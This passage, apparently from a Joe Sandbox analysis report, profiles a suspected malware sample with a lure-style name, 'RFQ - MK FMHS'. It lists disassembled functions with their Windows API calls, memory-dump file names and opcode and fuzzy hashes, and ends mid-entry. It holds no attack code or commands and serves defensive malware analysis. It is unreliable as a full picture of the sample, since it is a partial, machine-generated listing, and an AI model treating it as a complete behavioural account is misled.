                    • Opcode ID: 7286830d3b3a641c6807e974347c69c8fa803005a142dc1b959539ba6e3b794a
                    • Instruction ID: df7913d166dbd16b402bbb6fd2d27dac8da50c1ec251e63a522ecf91fe3394d7
                    • Opcode Fuzzy Hash: 7286830d3b3a641c6807e974347c69c8fa803005a142dc1b959539ba6e3b794a
                    • Instruction Fuzzy Hash: DD31BC7160025DEFDB14CF68DB48BAE7BA6EB44315F10422DF924E62D0CBB19914CB91
                    Function 00ECB6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                    Download Yara Rule
                    APIs
                    • IsWindowVisible.USER32(?), ref: 00ECB6C7
                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00ECB6E4
                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00ECB71C
                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00ECB742
                    • _wcsstr.LIBCMT ref: 00ECB74C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                    • String ID:
                    • API String ID: 3902887630-0
                    • Opcode ID: b47b110b520170e918d17e56f2ca861d32c1709a89b2807f1267dd0e5a77c58d
                    • Instruction ID: 4feb311ad456050645c5766631b345b40afad219e6bebd605d11933a819c868f
                    • Opcode Fuzzy Hash: b47b110b520170e918d17e56f2ca861d32c1709a89b2807f1267dd0e5a77c58d
                    • Instruction Fuzzy Hash: 07210732204204BAEB255B79DD4AF7B7BACDF85750F00516EFC05EA1A1EF62CC41D6A0
                    Function 00EFB405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E72612: GetWindowLongW.USER32(?,000000EB), ref: 00E72623
                    • GetWindowLongW.USER32(?,000000F0), ref: 00EFB44C
                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00EFB471
                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00EFB489
                    • GetSystemMetrics.USER32(00000004), ref: 00EFB4B2
                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00EE1184,00000000), ref: 00EFB4D0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Window$Long$MetricsSystem
                    • String ID:
                    • API String ID: 2294984445-0
                    • Opcode ID: ae874e243061dbe0c59642a66ad738ff2bc362162d233a878630d6bb4beb5585
                    • Instruction ID: 581e0dc0ce17a22a051f233e8d215417ffffcf311e639d38b0a81de86d1bed5e
                    • Opcode Fuzzy Hash: ae874e243061dbe0c59642a66ad738ff2bc362162d233a878630d6bb4beb5585
                    • Instruction Fuzzy Hash: 23218071910219AFCB208F39CD04A7A37A5EF09725F149728FA36E61E1F7309810DB80
                    Function 00EC97E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00EC9802
                      • Part of subcall function 00E77D2C: _memmove.LIBCMT ref: 00E77D66
                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00EC9834
                    • __itow.LIBCMT ref: 00EC984C
                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00EC9874
                    • __itow.LIBCMT ref: 00EC9885
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: MessageSend$__itow$_memmove
                    • String ID:
                    • API String ID: 2983881199-0
                    • Opcode ID: 751249cbe77ca97f3bc7a3caa07e7d75519597d20ad792422fa5d01df4f1fe62
                    • Instruction ID: bfff67bce479448297f3d264bde16ef5b4390b24e7004284bdf71ae30fcdf77d
                    • Opcode Fuzzy Hash: 751249cbe77ca97f3bc7a3caa07e7d75519597d20ad792422fa5d01df4f1fe62
                    • Instruction Fuzzy Hash: D921D632700204ABDB149A619D8AFEE3BE8EF4A714F046029F904FB242DA718D46C7D1
                    Function 00E712F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                    Download Yara Rule
                    APIs
                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E7134D
                    • SelectObject.GDI32(?,00000000), ref: 00E7135C
                    • BeginPath.GDI32(?), ref: 00E71373
                    • SelectObject.GDI32(?,00000000), ref: 00E7139C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ObjectSelect$BeginCreatePath
                    • String ID:
                    • API String ID: 3225163088-0
                    • Opcode ID: 8ba815a5b194f42e08b85cdf206bca239699764fd14a52cb9c746c9a139bc091
                    • Instruction ID: ff6a280ad29b6520507bb42e9f6be264f50622efb16aacf5f269158096583a37
                    • Opcode Fuzzy Hash: 8ba815a5b194f42e08b85cdf206bca239699764fd14a52cb9c746c9a139bc091
                    • Instruction Fuzzy Hash: E7212870800308FFDB119F29DC04BAD7BAAEF08325F15C266F918A61A1D7719995EBA0
                    Function 00ECC161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _memcmp
                    • String ID:
                    • API String ID: 2931989736-0
                    • Opcode ID: 10c1a5276cf7888eb0f902725587b521009064e471e83919db50294d31ca25a8
                    • Instruction ID: e1b64bf11ef9c789051ff0ea40b1c002a282dfc80735e9eb47fa8bca2cff6117
                    • Opcode Fuzzy Hash: 10c1a5276cf7888eb0f902725587b521009064e471e83919db50294d31ca25a8
                    • Instruction Fuzzy Hash: ED0121B26052067BE505A6124D45FAF73AC9F11398F185059FE08B7283E752DE1292F1
                    Function 00ED4D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentThreadId.KERNEL32 ref: 00ED4D5C
                    • __beginthreadex.LIBCMT ref: 00ED4D7A
                    • MessageBoxW.USER32(?,?,?,?), ref: 00ED4D8F
                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00ED4DA5
                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00ED4DAC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                    • String ID:
                    • API String ID: 3824534824-0
                    • Opcode ID: 594b73dddefc21d77fc4b174188db5aa26e98904076828dc24578b88e405049a
                    • Instruction ID: 87c8b2faa21d99560007b0115bd14da1e9424129caafe016feca5d24dfa9b731
                    • Opcode Fuzzy Hash: 594b73dddefc21d77fc4b174188db5aa26e98904076828dc24578b88e405049a
                    • Instruction Fuzzy Hash: 0F1108B2904208BFCB019BA89C08EEB7FADEB99324F144266FD14E3391D671CD05C7A0
                    Function 00EC874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00EC8766
                    • GetLastError.KERNEL32(?,00EC822A,?,?,?), ref: 00EC8770
                    • GetProcessHeap.KERNEL32(00000008,?,?,00EC822A,?,?,?), ref: 00EC877F
                    • HeapAlloc.KERNEL32(00000000,?,00EC822A,?,?,?), ref: 00EC8786
                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00EC879D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                    • String ID:
                    • API String ID: 842720411-0
                    • Opcode ID: 4803301a0849488dee631f9ed521e659a7974c24b59d806d8dd96807b4e62206
                    • Instruction ID: d6abcb45edd9aca1c3856f0e48b1fed21449eb52124d193ee5cece57c4f3ded9
                    • Opcode Fuzzy Hash: 4803301a0849488dee631f9ed521e659a7974c24b59d806d8dd96807b4e62206
                    • Instruction Fuzzy Hash: 5C016271601204FFDB104FA6DE88DB77B6CFF853557201439F949E2260DA328C15CA60
                    Function 00ED54E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                    Download Yara Rule
                    APIs
                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00ED5502
                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00ED5510
                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00ED5518
                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00ED5522
                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00ED555E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: PerformanceQuery$CounterSleep$Frequency
                    • String ID:
                    • API String ID: 2833360925-0
                    • Opcode ID: 740d1ff27eb8d7cfcffcb961cb4e886cc3d0fb47cbde87747d77dceac7cbb424
                    • Instruction ID: 5cc83cfb56d5228166632cf500b74e3891ad878137192519c90ceeb43f5bed19
                    • Opcode Fuzzy Hash: 740d1ff27eb8d7cfcffcb961cb4e886cc3d0fb47cbde87747d77dceac7cbb424
                    • Instruction Fuzzy Hash: 63015732D01A29DBCF00EFE9E888AEDBB79FF49701F410066E901B2241DB309655C7A1
                    Function 00EC7652 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                    Download Yara Rule
                    APIs
                    • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EC758C,80070057,?,?,?,00EC799D), ref: 00EC766F
                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EC758C,80070057,?,?), ref: 00EC768A
                    • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EC758C,80070057,?,?), ref: 00EC7698
                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EC758C,80070057,?), ref: 00EC76A8
                    • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EC758C,80070057,?,?), ref: 00EC76B4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: From$Prog$FreeStringTasklstrcmpi
                    • String ID:
                    • API String ID: 3897988419-0
                    • Opcode ID: 38efce7ae823c843a0f6347018bde03fcb599d4793165def6d65150bbf9c0153
                    • Instruction ID: 380c33b811b4c9fd01fa2130c3476aab4f9d8ac612a057e8a08db7338cf51d65
                    • Opcode Fuzzy Hash: 38efce7ae823c843a0f6347018bde03fcb599d4793165def6d65150bbf9c0153
                    • Instruction Fuzzy Hash: 4701B1B2601604AFDB104F19DD44FAA7FACEF84795F100028FD44E2211EB32DD01DBA0
                    Function 00EC85F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00EC8608
                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00EC8612
                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00EC8621
                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00EC8628
                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00EC863E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: HeapInformationToken$AllocErrorLastProcess
                    • String ID:
                    • API String ID: 44706859-0
                    • Opcode ID: 4d77caf60dfde2a5223c1d871fe6b3e54cbedcee97390adb2c3401cd55c1e588
                    • Instruction ID: df947a78985c2151f85928ef0c02e90d1006f064ff6fda4e55e7850fe31d1aad
                    • Opcode Fuzzy Hash: 4d77caf60dfde2a5223c1d871fe6b3e54cbedcee97390adb2c3401cd55c1e588
                    • Instruction Fuzzy Hash: 23F04F31201204BFEB104FA6DE89F7B3BACEFC9758B405429F945E6250CB61DC46DA60
                    Function 00EC8652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00EC8669
                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00EC8673
                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00EC8682
                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00EC8689
                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00EC869F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: HeapInformationToken$AllocErrorLastProcess
                    • String ID:
                    • API String ID: 44706859-0
                    • Opcode ID: 8a73d73e4b41dc43827d74ad2e67d5b0c889d8f9cbe6d31b8211bf6205b71494
                    • Instruction ID: 8f5567f4aea2ba4100f008905095298470561458db123dd6d953b4c6ea44dcdf
                    • Opcode Fuzzy Hash: 8a73d73e4b41dc43827d74ad2e67d5b0c889d8f9cbe6d31b8211bf6205b71494
                    • Instruction Fuzzy Hash: 15F04F71201204AFEB111FA6EE88FB73BACEF89B58B100039F945E6150CF61D955DA60
                    Function 00ECC6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                    Download Yara Rule
                    APIs
                    • GetDlgItem.USER32(?,000003E9), ref: 00ECC6BA
                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 00ECC6D1
                    • MessageBeep.USER32(00000000), ref: 00ECC6E9
                    • KillTimer.USER32(?,0000040A), ref: 00ECC705
                    • EndDialog.USER32(?,00000001), ref: 00ECC71F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                    • String ID:
                    • API String ID: 3741023627-0
                    • Opcode ID: f98e7e7c6fff17bfcab81abfdd3116a7122959ccf5345c69b8e8c9de76b089ea
                    • Instruction ID: a166cff5629ee4229cb33987c02a8029b7babb888e5a422ed8a93a65bfe15125
                    • Opcode Fuzzy Hash: f98e7e7c6fff17bfcab81abfdd3116a7122959ccf5345c69b8e8c9de76b089ea
                    • Instruction Fuzzy Hash: 40014F30500704ABEB215B21DE4EFA677B8FF44B05F10166EF586F14E1DBE1A959CA80
                    Function 00E713B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                    Download Yara Rule
                    APIs
                    • EndPath.GDI32(?), ref: 00E713BF
                    • StrokeAndFillPath.GDI32(?,?,00EABAD8,00000000,?), ref: 00E713DB
                    • SelectObject.GDI32(?,00000000), ref: 00E713EE
                    • DeleteObject.GDI32 ref: 00E71401
                    • StrokePath.GDI32(?), ref: 00E7141C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Path$ObjectStroke$DeleteFillSelect
                    • String ID:
                    • API String ID: 2625713937-0
                    • Opcode ID: 7946ce3ba0f5eac1d9d28cc25abfe019410ee3c06b241214fdf5b7ec3a80ded1
                    • Instruction ID: 4a05214394a8c87ce34a678e13b17ce685fb38629a5fe180356dce0a3add5977
                    • Opcode Fuzzy Hash: 7946ce3ba0f5eac1d9d28cc25abfe019410ee3c06b241214fdf5b7ec3a80ded1
                    • Instruction Fuzzy Hash: 72F0B230004308BFDB115F2AEC48B683BA6AF4533AF04D265E569A50B1DB318999EF60
                    Function 00EDC602 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                    Download Yara Rule
                    APIs
                    • CoInitialize.OLE32(00000000), ref: 00EDC69D
                    • CoCreateInstance.OLE32(00F02D6C,00000000,00000001,00F02BDC,?), ref: 00EDC6B5
                      • Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82
                    • CoUninitialize.OLE32 ref: 00EDC922
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: CreateInitializeInstanceUninitialize_memmove
                    • String ID: .lnk
                    • API String ID: 2683427295-24824748
                    • Opcode ID: 3d4a08cb73d1c808b6f4848c97be80e3a59cf41874d8a67346bcc55c855f3bf5
                    • Instruction ID: bf73c60a0c91cda6b9079d084fd0de7097f0a9b8e6a7a752f65c1e629a3befc3
                    • Opcode Fuzzy Hash: 3d4a08cb73d1c808b6f4848c97be80e3a59cf41874d8a67346bcc55c855f3bf5
                    • Instruction Fuzzy Hash: 72A13D71104205AFD304EF54C891EABB7F8FF95304F00992DF19AA71A2DB70EA49CB52
                    Function 00E82E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E90FF6: std::exception::exception.LIBCMT ref: 00E9102C
                      • Part of subcall function 00E90FF6: __CxxThrowException@8.LIBCMT ref: 00E91041
                      • Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82
                      • Part of subcall function 00E77BB1: _memmove.LIBCMT ref: 00E77C0B
                    • __swprintf.LIBCMT ref: 00E8302D
                    Strings
                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00E82EC6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                    • API String ID: 1943609520-557222456
                    • Opcode ID: d52225def26dc346686a951ebf0768ba77db8bbbaf0f3567a6c4c74db014be08
                    • Instruction ID: 6c7219910231e755ca9a8b722177cb4f71425ec7ec106101b549e4807d7177c0
                    • Opcode Fuzzy Hash: d52225def26dc346686a951ebf0768ba77db8bbbaf0f3567a6c4c74db014be08
                    • Instruction Fuzzy Hash: 54916D722083019FCB18FF24D885CAFB7E4EF85754F00691DF499A72A1DA60EE44CB52
                    Function 00EDBBA6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E748AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E748A1,?,?,00E737C0,?), ref: 00E748CE
                    • CoInitialize.OLE32(00000000), ref: 00EDBC26
